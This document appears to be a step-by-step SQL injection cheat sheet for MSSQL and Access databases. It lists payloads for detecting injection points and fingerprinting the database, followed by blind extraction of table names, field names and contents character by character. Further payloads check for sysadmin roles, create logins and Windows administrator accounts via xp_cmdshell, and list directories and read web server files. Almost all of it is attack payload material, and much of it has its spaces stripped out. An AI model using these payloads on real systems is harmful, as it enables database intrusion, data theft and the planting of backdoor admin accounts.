1. Determine whether there is injection
;and1=1
;and1=2
2. Preliminary check for whether the backend is MSSQL
;anduser>0
3. Injection parameter is a string type
'and[query condition]and''='
4. Search parameter is not filtered
'and[query condition]and'%25'='
5. Determine the database system
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)frommsysobjects)>0access
6. Guess the database name
;and(SelectCount(*)from[database name])>0
7. Guess the field name
;and(SelectCount(field name) from database name)>0
8. Guess the length of the record in the field
;and(selecttop1len(field name) from database name)>0
9. (1) Guess the ASCII value of a character in the field (Access)
;and(selecttop1asc(mid(field name, 1, 1)) from database name)>0
(2) Guess the ASCII value of a character in the field (MSSQL)
;and(selecttop1unicode(substring(field name, 1, 1)) from database name)>0
10. Test the privilege level (MSSQL)
;and1=(SELECTIS_SRVROLEMEMBER('sysadmin'));--
;and1=(SELECTIS_SRVROLEMEMBER('serveradmin'));--
;and1=(SELECTIS_SRVROLEMEMBER('setupadmin'));--
;and1=(SELECTIS_SRVROLEMEMBER('securityadmin'));--
;and1=(SELECTIS_SRVROLEMEMBER('diskadmin'));--
;and1=(SELECTIS_SRVROLEMEMBER('bulkadmin'));--
;and1=(SELECTIS_MEMBER('db_owner'));--
11. Add an MSSQL login and a system account
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;-
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add';--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/add';--
;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add';--
12. (1) Dump the directory listing
;createtabledirs(pathsvarchar(100),idint)
;insertdirsexecmaster.dbo.xp_dirtree'c:/'
;and(selecttop1pathsfromdirs)>0
;and(selecttop1pathsfromdirswherepathsnotin('paths obtained from the previous step'))>)
(2) Traverse the directory
;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));-
;inserttempexecmaster.dbo.xp_availablemedia;-get all current drives
;insertintotemp(id)execmaster.dbo.xp_subdirs'c:/';--Get subdirectory list
;insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:/';--Get the directory tree structure of all subdirectories
;insertintotemp(id)execmaster.dbo.xp_cmdshell'typec:/web/index.asp';--View the content of the file